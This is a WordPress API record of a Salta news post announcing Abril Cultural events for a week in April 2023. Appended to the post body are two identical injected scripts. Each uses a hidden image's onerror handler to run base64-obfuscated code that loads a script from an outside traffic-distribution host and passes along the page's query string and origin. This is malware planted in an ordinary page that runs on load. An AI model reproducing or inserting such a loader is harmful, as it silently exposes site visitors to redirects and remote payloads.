{"id":2488,"date":"2023-04-11T09:53:58","date_gmt":"2023-04-11T12:53:58","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2488"},"modified":"2025-08-14T00:19:25","modified_gmt":"2025-08-14T03:19:25","slug":"abril-cultural-conoce-las-propuestas-destacadas-para-esta-semana","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2488","title":{"rendered":"<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/abril-cultural-conoce-las-propuestas-destacadas-para-esta-semana-88985\">Abril Cultural: Conoc\u00e9 las propuestas destacadas para esta semana<\/a>"},"content":{"rendered":"\n<h3 class=\"has-white-color has-vivid-cyan-blue-background-color has-text-color has-background wp-block-heading\"><em>Visitas guiadas, muestras de arte, presentaciones de libros y audiovisuales, son algunas de las propuestas para esta segunda semana de abril.<\/em><\/h3>\n\n\n\n<p>Tras realizar la convocatoria al encuentro del Arte como todos los a\u00f1os, Pro Cultura Salta junto a la Secretar\u00eda de Cultura invitan a participar del calendario de actividades que nuclean distintas disciplinas: artes visuales, m\u00fasica, danza, literatura, cine, teatro, entre otras.<\/p>\n\n\n\n<p>Este martes 11 de abril, de 10 a 12 por la ma\u00f1ana y desde las 15 horas por la tarde, en el Centro Cultural Am\u00e9rica, se realizar\u00e1 una visita guiada para conocer los museos a trav\u00e9s de la virtualidad. Asimismo, a partir de las 20 horas, se realizar\u00e1 la Inauguraci\u00f3n Oficial de la Muestra \u00abEscenas Intrascendentes de la vida real\u00bb de Nicol\u00e1s Picatto\u00bb, en la sala Dakak, ubicada en la sede de Pro Cultura, Mitre 331, con entrada libre y gratuita.<\/p>\n\n\n\n<p>El mi\u00e9rcoles 12 de abril a las 20:30 horas, en Galer\u00eda Vitraux, ubicada en Dean Funes 343, se llevar\u00e1 a cabo la muestra fotogr\u00e1fica \u201cTodo un mundo: de lo anal\u00f3gico a lo digital\u201d de Isidoro Zang y Ren\u00e9 Rodr\u00edguez Villagra con entrada libre y gratuita.<\/p>\n\n\n\n<p>El jueves 13 de abril tendr\u00e1 lugar \u201cExpresiones vivas de mi tierra\u201d en el Mercado Artesanal, Av. San Mart\u00edn 3555, durante todo el d\u00eda. Se expondr\u00e1n y presentar\u00e1n artistas representantes de Campo Quijano, con entrada libre y gratuita. A partir de las 18:30 horas, se presentar\u00e1 el libro \u201cUn museo testigo de la Historia de Salta\u201d en el Museo Hist\u00f3rico del Norte. La presentaci\u00f3n estar\u00e1 a cargo del Director del Museo, Mario Lazarovich, los comentarios y lecturas sobre la obra ser\u00e1n acompa\u00f1ados con m\u00fasica y canto en el Cabildo Hist\u00f3rico.<\/p>\n\n\n\n<p>El viernes 14, se realizar\u00e1 un recital de Jazz a cargo de los artistas Echaz\u00fa (h) y Nocceti en el Sal\u00f3n Blanco del Centro Cultural Am\u00e9rica, Mitre 23, a partir de las 20 horas.<\/p>\n\n\n\n<p>Asimismo, el d\u00eda s\u00e1bado 15 a partir de las 19 horas, se realizar\u00e1 la actividad \u201cCultura en lo Alto: Muestra de Cortos Ganadores de la VI Edici\u00f3n del Festival Nacional de Cortometrajes\u201d. En el mirador del cerro San Bernardo, se proyectar\u00e1n los cortometrajes ganadores del certamen \u201cCalzate estos cortos\u201d.<\/p>\n\n\n\n<p>Finalmente, el d\u00eda 16 de abril se realizar\u00e1 el Concierto Antiqua Camera UCASAL en la Iglesia San Francisco a partir de las 20 horas, en un espect\u00e1culo musical para toda la familia, con entrada libre y gratuita.<\/p>\n\n\n\n<p class=\"has-text-align-left\">Para conocer el cronograma en detalle, <a href=\"https:\/\/abrilcultural.com.ar\/\" target=\"_blank\" rel=\"noopener\" title=\"\">ingres\u00e1<\/a> a CALENDARIO ABRIL CULTURAL<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/abril-cultural-conoce-las-propuestas-destacadas-para-esta-semana-88985\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Visitas guiadas, muestras de arte, presentaciones de libros y audiovisuales, son algunas de las propuestas para esta segunda semana de abril. Tras realizar la convocatoria al encuentro del Arte como todos los a\u00f1os, Pro Cultura Salta junto a la Secretar\u00eda de Cultura invitan a participar del calendario de actividades que nuclean distintas disciplinas: artes visuales, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2489,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-2488","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2488"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2488"}],"version-history":[{"count":4,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2488\/revisions"}],"predecessor-version":[{"id":7120,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2488\/revisions\/7120"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2489"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2488"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2488"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2488"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}